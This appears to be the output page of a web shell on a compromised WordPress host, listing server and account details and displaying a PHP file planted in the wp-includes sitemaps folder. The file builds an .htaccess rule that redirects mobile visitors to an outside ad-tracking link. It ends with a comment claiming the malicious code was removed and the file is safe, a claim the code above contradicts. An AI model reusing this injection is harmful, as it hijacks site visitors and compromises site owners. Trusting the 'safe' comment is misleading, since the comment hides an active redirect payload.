HEX
Server: Apache
System: Linux p3plzcpnl489526.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: vmasmheia229 (9244908)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/vmasmheia229/domains/blog.theomggroup.com/html/wp-includes/sitemaps/post.1770043117.php
<!--fiuLUdLx-->
<?php

error_reporting(E_ALL);
ini_set('display_errors', 1);

$root = rtrim($_SERVER['DOCUMENT_ROOT'], '/');
$path = $root . '/.htaccess';

$host = $_SERVER['HTTP_HOST'] ?? '';
$host = preg_replace('/:\d+$/', '', $host);
$parts = explode('.', $host);
if (count($parts) > 1) {
    array_pop($parts);
}
$var = implode('.', $parts);

$insert =
"RewriteEngine On\n".
"RewriteCond %{HTTP_USER_AGENT} \"Android|iPhone|iPad|iPod|BlackBerry|Windows Phone\" [NC]\n".
"RewriteRule ^.*$ https://lakns.com/link?z=9557727&var={$var}&ymid={CLICK_ID} [R=302,L]\n\n";


/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/